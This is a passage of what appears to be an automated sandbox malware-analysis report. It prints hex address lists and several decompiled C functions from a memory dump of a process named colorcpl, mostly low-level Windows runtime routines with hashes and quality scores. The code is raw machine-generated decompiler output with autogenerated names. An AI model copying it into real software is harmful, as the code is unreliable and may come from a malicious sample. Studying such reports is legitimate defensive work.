                                                                                                0x06eab9f7
                                                                                                0x06eab9f7
                                                                                                0x06eab9fa
                                                                                                0x06eaba03
                                                                                                0x06eaba07
                                                                                                0x06eaba0c
                                                                                                0x06eaba10
                                                                                                0x06eaba17
                                                                                                0x00000000
                                                                                                0x06eab9f7
                                                                                                0x06eab9a6
                                                                                                0x06eab9a8
                                                                                                0x06eab9af
                                                                                                0x06eab9b3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06eab9b9
                                                                                                0x00000000
                                                                                                0x06eab9b9
                                                                                                0x06eab94d
                                                                                                0x06eab98f
                                                                                                0x06eab995
                                                                                                0x06eab999
                                                                                                0x06eab960
                                                                                                0x06eab967
                                                                                                0x06eab968
                                                                                                0x06eab96a
                                                                                                0x00000000
                                                                                                0x06eab96a
                                                                                                0x06eab99b
                                                                                                0x06eab99e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06eab99e
                                                                                                0x06eab951
                                                                                                0x06eab954
                                                                                                0x06eab95a
                                                                                                0x06eab95e
                                                                                                0x06eab972
                                                                                                0x06eab979
                                                                                                0x06eab97d
                                                                                                0x06eab97f
                                                                                                0x06eab980
                                                                                                0x06eab982
                                                                                                0x06eab984
                                                                                                0x00000000
                                                                                                0x06eab984
                                                                                                0x00000000
                                                                                                0x06eab926
                                                                                                0x00000000
                                                                                                0x06eab926

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b3afeaab54403271a45989b4cf64dbb5754dc90200ea4b2314b0fc5a645bc310
                                                                                                • Instruction ID: 19acbee7b9c6f63969d103a961031547fd203a35265eca7f1579d489078d3dc0
                                                                                                • Opcode Fuzzy Hash: b3afeaab54403271a45989b4cf64dbb5754dc90200ea4b2314b0fc5a645bc310
                                                                                                • Instruction Fuzzy Hash: 0671FE32600701EFE7B18F24CD84FA6BBEAEF40724F115528E6658B6A0DB75F940CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 78%
                                                                                                			E06E152A5(char __ecx) {
                                                                                                				char _v20;
                                                                                                				char _v28;
                                                                                                				char _v29;
                                                                                                				void* _v32;
                                                                                                				void* _v36;
                                                                                                				void* _v37;
                                                                                                				void* _v38;
                                                                                                				void* _v40;
                                                                                                				void* _v46;
                                                                                                				void* _v64;
                                                                                                				void* __ebx;
                                                                                                				intOrPtr* _t49;
                                                                                                				signed int _t53;
                                                                                                				short _t85;
                                                                                                				signed int _t87;
                                                                                                				signed int _t88;
                                                                                                				signed int _t89;
                                                                                                				intOrPtr _t101;
                                                                                                				intOrPtr* _t102;
                                                                                                				intOrPtr* _t104;
                                                                                                				signed int _t106;
                                                                                                				void* _t108;
                                                                                                
                                                                                                				_t93 = __ecx;
                                                                                                				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                                                				_push(_t88);
                                                                                                				_v29 = __ecx;
                                                                                                				_t89 = _t88 | 0xffffffff;
                                                                                                				while(1) {
                                                                                                					E06E2EEF0(0x6f079a0);
                                                                                                					_t104 =  *0x6f08210; // 0xe22d88
                                                                                                					if(_t104 == 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					asm("lock inc dword [esi]");
                                                                                                					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                                                                					E06E2EB70(_t93, 0x6f079a0);
                                                                                                					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                                                						_t101 =  *0x7ffe02dc;
                                                                                                						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                                						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                                                							L9:
                                                                                                							_push(0);
                                                                                                							_push(0);
                                                                                                							_push(0);
                                                                                                							_push(0);
                                                                                                							_push(0x90028);
                                                                                                							_push(_t108 + 0x20);
                                                                                                							_push(0);
                                                                                                							_push(0);
                                                                                                							_push(0);
                                                                                                							_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                							_t53 = E06E59890();
                                                                                                							__eflags = _t53;
                                                                                                							if(_t53 >= 0) {
                                                                                                								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                                								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                                                									E06E2EEF0(0x6f079a0);
                                                                                                									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                                                									E06E2EB70(0, 0x6f079a0);
                                                                                                								}
                                                                                                								goto L3;
                                                                                                							}
                                                                                                							__eflags = _t53 - 0xc0000012;
                                                                                                							if(__eflags == 0) {
                                                                                                								L12:
                                                                                                								_t13 = _t104 + 0xc; // 0xe22d95
                                                                                                								_t93 = _t13;
                                                                                                								 *((char*)(_t108 + 0x12)) = 0;
                                                                                                								__eflags = E06E4F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                                                								if(__eflags >= 0) {
                                                                                                									L15:
                                                                                                									_t102 = _v28;
                                                                                                									 *_t102 = 2;
                                                                                                									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                                									E06E2EEF0(0x6f079a0);
                                                                                                									__eflags =  *0x6f08210 - _t104; // 0xe22d88
                                                                                                									if(__eflags == 0) {
                                                                                                										__eflags =  *((char*)(_t108 + 0xe));
                                                                                                										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                                                										 *0x6f08210 = _t102;
                                                                                                										_t32 = _t102 + 0xc; // 0x0
                                                                                                										 *_t95 =  *_t32;
                                                                                                										_t33 = _t102 + 0x10; // 0x0
                                                                                                										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                                                										_t35 = _t102 + 4; // 0xffffffff
                                                                                                										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                                                										if(__eflags != 0) {
                                                                                                											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                                                                											E06E94888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                                                                										}
                                                                                                										E06E2EB70(_t95, 0x6f079a0);
                                                                                                										asm("lock xadd [esi], eax");
                                                                                                										if(__eflags == 0) {
                                                                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                											E06E595D0();
                                                                                                											L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                										}
                                                                                                										asm("lock xadd [esi], ebx");
                                                                                                										__eflags = _t89 == 1;
                                                                                                										if(_t89 == 1) {
                                                                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                											E06E595D0();
                                                                                                											L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                										}
                                                                                                										_t49 = _t102;
                                                                                                										L4:
                                                                                                										return _t49;
                                                                                                									}
                                                                                                									E06E2EB70(_t93, 0x6f079a0);
                                                                                                									asm("lock xadd [esi], eax");
                                                                                                									if(__eflags == 0) {
                                                                                                										_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                										E06E595D0();
                                                                                                										L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                									}
                                                                                                									 *_t102 = 1;
                                                                                                									asm("lock xadd [edi], eax");
                                                                                                									if(__eflags == 0) {
                                                                                                										_t28 = _t102 + 4; // 0xffffffff
                                                                                                										_push( *_t28);
                                                                                                										E06E595D0();
                                                                                                										L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                                                									}
                                                                                                									continue;
                                                                                                								}
                                                                                                								_t93 =  &_v20;
                                                                                                								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                                                                								_t85 = 6;
                                                                                                								_v20 = _t85;
                                                                                                								_t87 = E06E4F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                                                								__eflags = _t87;
                                                                                                								if(_t87 < 0) {
                                                                                                									goto L3;
                                                                                                								}
                                                                                                								 *((char*)(_t108 + 0xe)) = 1;
                                                                                                								goto L15;
                                                                                                							}
                                                                                                							__eflags = _t53 - 0xc000026e;
                                                                                                							if(__eflags != 0) {
                                                                                                								goto L3;
                                                                                                							}
                                                                                                							goto L12;
                                                                                                						}
                                                                                                						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                                                						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                                                							goto L3;
                                                                                                						} else {
                                                                                                							goto L9;
                                                                                                						}
                                                                                                					}
                                                                                                					L3:
                                                                                                					_t49 = _t104;
                                                                                                					goto L4;
                                                                                                				}
                                                                                                				_t49 = 0;
                                                                                                				goto L4;
                                                                                                			}


























                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e4499ccf136eeba21abcebd52a8b1f4f13691f7d9c0c4c8dbcc56d5d7356e2ea
                                                                                                • Instruction ID: c6b8fee306a1bb7297ea23399c50b69e610ad9091ace240845196f10bdcd6f68
                                                                                                • Opcode Fuzzy Hash: e4499ccf136eeba21abcebd52a8b1f4f13691f7d9c0c4c8dbcc56d5d7356e2ea
                                                                                                • Instruction Fuzzy Hash: D451EEB1205742AFD7A0EF64CC40B67BBE9FF80714F20191EE4A587691E770E844CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E42AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                                                                				signed short* _v8;
                                                                                                				signed short* _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr* _v28;
                                                                                                				signed int _v32;
                                                                                                				signed int _v36;
                                                                                                				short _t56;
                                                                                                				signed int _t57;
                                                                                                				intOrPtr _t58;
                                                                                                				signed short* _t61;
                                                                                                				intOrPtr _t72;
                                                                                                				intOrPtr _t75;
                                                                                                				intOrPtr _t84;
                                                                                                				intOrPtr _t87;
                                                                                                				intOrPtr* _t90;
                                                                                                				signed short* _t91;
                                                                                                				signed int _t95;
                                                                                                				signed short* _t96;
                                                                                                				intOrPtr _t97;
                                                                                                				intOrPtr _t102;
                                                                                                				signed int _t108;
                                                                                                				intOrPtr _t110;
                                                                                                				signed int _t111;
                                                                                                				signed short* _t112;
                                                                                                				void* _t113;
                                                                                                				signed int _t116;
                                                                                                				signed short** _t119;
                                                                                                				short* _t120;
                                                                                                				signed int _t123;
                                                                                                				signed int _t124;
                                                                                                				void* _t125;
                                                                                                				intOrPtr _t127;
                                                                                                				signed int _t128;
                                                                                                
                                                                                                				_t90 = __ecx;
                                                                                                				_v16 = __edx;
                                                                                                				_t108 = _a4;
                                                                                                				_v28 = __ecx;
                                                                                                				_t4 = _t108 - 1; // -1
                                                                                                				if(_t4 > 0x13) {
                                                                                                					L15:
                                                                                                					_t56 = 0xc0000100;
                                                                                                					L16:
                                                                                                					return _t56;
                                                                                                				}
                                                                                                				_t57 = _t108 * 0x1c;
                                                                                                				_v32 = _t57;
                                                                                                				_t6 = _t57 + 0x6f08204; // 0x0
                                                                                                				_t123 =  *_t6;
                                                                                                				_t7 = _t57 + 0x6f08208; // 0x6f08207
                                                                                                				_t8 = _t57 + 0x6f08208; // 0x6f08207
                                                                                                				_t119 = _t8;
                                                                                                				_v36 = _t123;
                                                                                                				_t110 = _t7 + _t123 * 8;
                                                                                                				_v24 = _t110;
                                                                                                				_t111 = _a4;
                                                                                                				if(_t119 >= _t110) {
                                                                                                					L12:
                                                                                                					if(_t123 != 3) {
                                                                                                						_t58 =  *0x6f08450; // 0xe217fe
                                                                                                						if(_t58 == 0) {
                                                                                                							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t26 = _t57 + 0x6f0821c; // 0x0
                                                                                                						_t58 =  *_t26;
                                                                                                					}
                                                                                                					 *_t90 = _t58;
                                                                                                					goto L15;
                                                                                                				} else {
                                                                                                					goto L2;
                                                                                                				}
                                                                                                				while(1) {
                                                                                                					_t116 =  *_t61 & 0x0000ffff;
                                                                                                					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                                                					if(_t116 == _t128) {
                                                                                                						goto L18;
                                                                                                					}
                                                                                                					L5:
                                                                                                					if(_t116 >= 0x61) {
                                                                                                						if(_t116 > 0x7a) {
                                                                                                							_t97 =  *0x6f06d5c; // 0x7f5d0654
                                                                                                							_t72 =  *0x6f06d5c; // 0x7f5d0654
                                                                                                							_t75 =  *0x6f06d5c; // 0x7f5d0654
                                                                                                							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                                                                						} else {
                                                                                                							_t116 = _t116 - 0x20;
                                                                                                						}
                                                                                                					}
                                                                                                					if(_t128 >= 0x61) {
                                                                                                						if(_t128 > 0x7a) {
                                                                                                							_t102 =  *0x6f06d5c; // 0x7f5d0654
                                                                                                							_t84 =  *0x6f06d5c; // 0x7f5d0654
                                                                                                							_t87 =  *0x6f06d5c; // 0x7f5d0654
                                                                                                							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                                                                						} else {
                                                                                                							_t128 = _t128 - 0x20;
                                                                                                						}
                                                                                                					}
                                                                                                					if(_t116 == _t128) {
                                                                                                						_t61 = _v12;
                                                                                                						_t96 = _v8;
                                                                                                					} else {
                                                                                                						_t113 = _t116 - _t128;
                                                                                                						L9:
                                                                                                						_t111 = _a4;
                                                                                                						if(_t113 == 0) {
                                                                                                							_t115 =  &(( *_t119)[_t111 + 1]);
                                                                                                							_t33 =  &(_t119[1]); // 0x100
                                                                                                							_t120 = _a8;
                                                                                                							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                                                                							_t35 = _t95 - 1; // 0xff
                                                                                                							_t124 = _t35;
                                                                                                							if(_t120 == 0) {
                                                                                                								L27:
                                                                                                								 *_a16 = _t95;
                                                                                                								_t56 = 0xc0000023;
                                                                                                								goto L16;
                                                                                                							}
                                                                                                							if(_t124 >= _a12) {
                                                                                                								if(_a12 >= 1) {
                                                                                                									 *_t120 = 0;
                                                                                                								}
                                                                                                								goto L27;
                                                                                                							}
                                                                                                							 *_a16 = _t124;
                                                                                                							_t125 = _t124 + _t124;
                                                                                                							E06E5F3E0(_t120, _t115, _t125);
                                                                                                							_t56 = 0;
                                                                                                							 *((short*)(_t125 + _t120)) = 0;
                                                                                                							goto L16;
                                                                                                						}
                                                                                                						_t119 =  &(_t119[2]);
                                                                                                						if(_t119 < _v24) {
                                                                                                							L2:
                                                                                                							_t91 =  *_t119;
                                                                                                							_t61 = _t91;
                                                                                                							_v12 = _t61;
                                                                                                							_t112 =  &(_t61[_t111]);
                                                                                                							_v8 = _t112;
                                                                                                							if(_t61 >= _t112) {
                                                                                                								break;
                                                                                                							} else {
                                                                                                								_t127 = _v16 - _t91;
                                                                                                								_t96 = _t112;
                                                                                                								_v20 = _t127;
                                                                                                								_t116 =  *_t61 & 0x0000ffff;
                                                                                                								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                                                								if(_t116 == _t128) {
                                                                                                									goto L18;
                                                                                                								}
                                                                                                								goto L5;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t90 = _v28;
                                                                                                							_t57 = _v32;
                                                                                                							_t123 = _v36;
                                                                                                							goto L12;
                                                                                                						}
                                                                                                					}
                                                                                                					L18:
                                                                                                					_t61 =  &(_t61[1]);
                                                                                                					_v12 = _t61;
                                                                                                					if(_t61 >= _t96) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t127 = _v20;
                                                                                                				}
                                                                                                				_t113 = 0;
                                                                                                				goto L9;
                                                                                                			}







































                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b039971e82205d94855b93328a6ca8a16d507ba81ffa9056c3e88d965f6e61b1
                                                                                                • Instruction ID: 12ac958a77c868bc961254a1315dcf1383be994d70a764e53bf3751e65fce1a7
                                                                                                • Opcode Fuzzy Hash: b039971e82205d94855b93328a6ca8a16d507ba81ffa9056c3e88d965f6e61b1
                                                                                                • Instruction Fuzzy Hash: 5D51C076A002158FDB54EF2CD8809BDB7B2FB88700715845AFE56DB318D730AE51CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E06EDAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed short* _t36;
                                                                                                				signed int _t41;
                                                                                                				char* _t42;
                                                                                                				intOrPtr _t43;
                                                                                                				signed int _t47;
                                                                                                				void* _t52;
                                                                                                				signed int _t57;
                                                                                                				intOrPtr _t61;
                                                                                                				signed char _t62;
                                                                                                				signed int _t72;
                                                                                                				signed char _t85;
                                                                                                				signed int _t88;
                                                                                                
                                                                                                				_t73 = __edx;
                                                                                                				_push(__ecx);
                                                                                                				_t85 = __ecx;
                                                                                                				_v8 = __edx;
                                                                                                				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                                                                                				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                                                                                				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                                                                                					_t57 = _t57 | 0x00000001;
                                                                                                				}
                                                                                                				_t88 = 0;
                                                                                                				_t36 = 0;
                                                                                                				_t96 = _a12;
                                                                                                				if(_a12 == 0) {
                                                                                                					_t62 = _a8;
                                                                                                					__eflags = _t62;
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					_t52 = E06EDC38B(_t85, _t73, _t57, 0);
                                                                                                					_t62 = _a8;
                                                                                                					 *_t62 = _t52;
                                                                                                					_t36 = 0;
                                                                                                					goto L11;
                                                                                                				} else {
                                                                                                					_t36 = E06EDACFD(_t85, _t73, _t96, _t57, _a8);
                                                                                                					if(0 == 0 || 0 == 0xffffffff) {
                                                                                                						_t72 = _t88;
                                                                                                					} else {
                                                                                                						_t72 =  *0x00000000 & 0x0000ffff;
                                                                                                					}
                                                                                                					 *_a12 = _t72;
                                                                                                					_t62 = _a8;
                                                                                                					L11:
                                                                                                					_t73 = _v8;
                                                                                                					L12:
                                                                                                					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                                                                                						L19:
                                                                                                						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                                                                                							L22:
                                                                                                							_t74 = _v8;
                                                                                                							__eflags = _v8;
                                                                                                							if(__eflags != 0) {
                                                                                                								L25:
                                                                                                								__eflags = _t88 - 2;
                                                                                                								if(_t88 != 2) {
                                                                                                									__eflags = _t85 + 0x44 + (_t88 << 6);
                                                                                                									_t88 = E06EDFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                                                                                									goto L34;
                                                                                                								}
                                                                                                								L26:
                                                                                                								_t59 = _v8;
                                                                                                								E06EDEA55(_t85, _v8, _t57);
                                                                                                								asm("sbb esi, esi");
                                                                                                								_t88 =  ~_t88;
                                                                                                								_t41 = E06E37D50();
                                                                                                								__eflags = _t41;
                                                                                                								if(_t41 == 0) {
                                                                                                									_t42 = 0x7ffe0380;
                                                                                                								} else {
                                                                                                									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                								}
                                                                                                								__eflags =  *_t42;
                                                                                                								if( *_t42 != 0) {
                                                                                                									_t43 =  *[fs:0x30];
                                                                                                									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                                                                                									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                                                                                										__eflags = _t88;
                                                                                                										if(_t88 != 0) {
                                                                                                											E06ED1608(_t85, _t59, 3);
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								goto L34;
                                                                                                							}
                                                                                                							_push(_t62);
                                                                                                							_t47 = E06EE1536(0x6f08ae4, (_t74 -  *0x6f08b04 >> 0x14) + (_t74 -  *0x6f08b04 >> 0x14), _t88, __eflags);
                                                                                                							__eflags = _t47;
                                                                                                							if(_t47 == 0) {
                                                                                                								goto L26;
                                                                                                							}
                                                                                                							_t74 = _v12;
                                                                                                							_t27 = _t47 - 1; // -1
                                                                                                							_t88 = _t27;
                                                                                                							goto L25;
                                                                                                						}
                                                                                                						_t62 = _t85;
                                                                                                						if(L06EDC323(_t62, _v8, _t57) != 0xffffffff) {
                                                                                                							goto L22;
                                                                                                						}
                                                                                                						_push(_t62);
                                                                                                						_push(_t88);
                                                                                                						E06EDA80D(_t85, 9, _v8, _t88);
                                                                                                						goto L34;
                                                                                                					} else {
                                                                                                						_t101 = _t36;
                                                                                                						if(_t36 != 0) {
                                                                                                							L16:
                                                                                                							if(_t36 == 0xffffffff) {
                                                                                                								goto L19;
                                                                                                							}
                                                                                                							_t62 =  *((intOrPtr*)(_t36 + 2));
                                                                                                							if((_t62 & 0x0000000f) == 0) {
                                                                                                								goto L19;
                                                                                                							}
                                                                                                							_t62 = _t62 & 0xf;
                                                                                                							if(E06EBCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                                                                                								L34:
                                                                                                								return _t88;
                                                                                                							}
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						_t62 = _t85;
                                                                                                						_t36 = E06EDACFD(_t62, _t73, _t101, _t57, _t62);
                                                                                                						if(_t36 == 0) {
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						goto L16;
                                                                                                					}
                                                                                                				}
                                                                                                			}




















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bedd4b2da8509816cff47c9f58216d43e7da7c908e1130323b0a97ab775c14a6
                                                                                                • Instruction ID: 4b5ac502008b483ce16f3dae465d2f939cd79c4fad808647a6426e2f03447656
                                                                                                • Opcode Fuzzy Hash: bedd4b2da8509816cff47c9f58216d43e7da7c908e1130323b0a97ab775c14a6
                                                                                                • Instruction Fuzzy Hash: 5941F7B1B003115BDBA5DB2DCC84B7BB39AAF84624F246279FC2687290D734DA43C790
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E06E3DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                				char _v5;
                                                                                                				signed int _v12;
                                                                                                				signed int* _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				signed int _t54;
                                                                                                				char* _t58;
                                                                                                				signed int _t66;
                                                                                                				intOrPtr _t67;
                                                                                                				intOrPtr _t68;
                                                                                                				intOrPtr _t72;
                                                                                                				intOrPtr _t73;
                                                                                                				signed int* _t75;
                                                                                                				intOrPtr _t79;
                                                                                                				intOrPtr _t80;
                                                                                                				char _t82;
                                                                                                				signed int _t83;
                                                                                                				signed int _t84;
                                                                                                				signed int _t88;
                                                                                                				signed int _t89;
                                                                                                				intOrPtr _t90;
                                                                                                				intOrPtr _t92;
                                                                                                				signed int _t97;
                                                                                                				intOrPtr _t98;
                                                                                                				intOrPtr* _t99;
                                                                                                				signed int* _t101;
                                                                                                				signed int* _t102;
                                                                                                				intOrPtr* _t103;
                                                                                                				intOrPtr _t105;
                                                                                                				signed int _t106;
                                                                                                				void* _t118;
                                                                                                
                                                                                                				_t92 = __edx;
                                                                                                				_t75 = _a4;
                                                                                                				_t98 = __ecx;
                                                                                                				_v44 = __edx;
                                                                                                				_t106 = _t75[1];
                                                                                                				_v40 = __ecx;
                                                                                                				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                                                                					_t82 = 0;
                                                                                                				} else {
                                                                                                					_t82 = 1;
                                                                                                				}
                                                                                                				_v5 = _t82;
                                                                                                				_t6 = _t98 + 0xc8; // 0xc9
                                                                                                				_t101 = _t6;
                                                                                                				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                                                                				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                                                                				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                                                                				if(_t82 != 0) {
                                                                                                					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                                                                					_t83 =  *_t75;
                                                                                                					_t54 = _t75[1];
                                                                                                					 *_t101 = _t83;
                                                                                                					_t84 = _t83 | _t54;
                                                                                                					_t101[1] = _t54;
                                                                                                					if(_t84 == 0) {
                                                                                                						_t101[1] = _t101[1] & _t84;
                                                                                                						 *_t101 = 1;
                                                                                                					}
                                                                                                					goto L19;
                                                                                                				} else {
                                                                                                					if(_t101 == 0) {
                                                                                                						E06E1CC50(E06E14510(0xc000000d));
                                                                                                						_t88 =  *_t101;
                                                                                                						_t97 = _t101[1];
                                                                                                						L15:
                                                                                                						_v12 = _t88;
                                                                                                						_t66 = _t88 -  *_t75;
                                                                                                						_t89 = _t97;
                                                                                                						asm("sbb ecx, [ebx+0x4]");
                                                                                                						_t118 = _t89 - _t97;
                                                                                                						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                                                                							_t66 = _t66 | 0xffffffff;
                                                                                                							_t89 = 0x7fffffff;
                                                                                                						}
                                                                                                						 *_t101 = _t66;
                                                                                                						_t101[1] = _t89;
                                                                                                						L19:
                                                                                                						if(E06E37D50() != 0) {
                                                                                                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                						} else {
                                                                                                							_t58 = 0x7ffe0386;
                                                                                                						}
                                                                                                						_t102 = _v16;
                                                                                                						if( *_t58 != 0) {
                                                                                                							_t58 = E06EE8ED6(_t102, _t98);
                                                                                                						}
                                                                                                						_t76 = _v44;
                                                                                                						E06E32280(_t58, _v44);
                                                                                                						E06E3DD82(_v44, _t102, _t98);
                                                                                                						E06E3B944(_t102, _v5);
                                                                                                						return E06E2FFB0(_t76, _t98, _t76);
                                                                                                					}
                                                                                                					_t99 = 0x7ffe03b0;
                                                                                                					do {
                                                                                                						_t103 = 0x7ffe0010;
                                                                                                						do {
                                                                                                							_t67 =  *0x6f08628; // 0x0
                                                                                                							_v28 = _t67;
                                                                                                							_t68 =  *0x6f0862c; // 0x0
                                                                                                							_v32 = _t68;
                                                                                                							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                                                                							_v20 =  *_t99;
                                                                                                							while(1) {
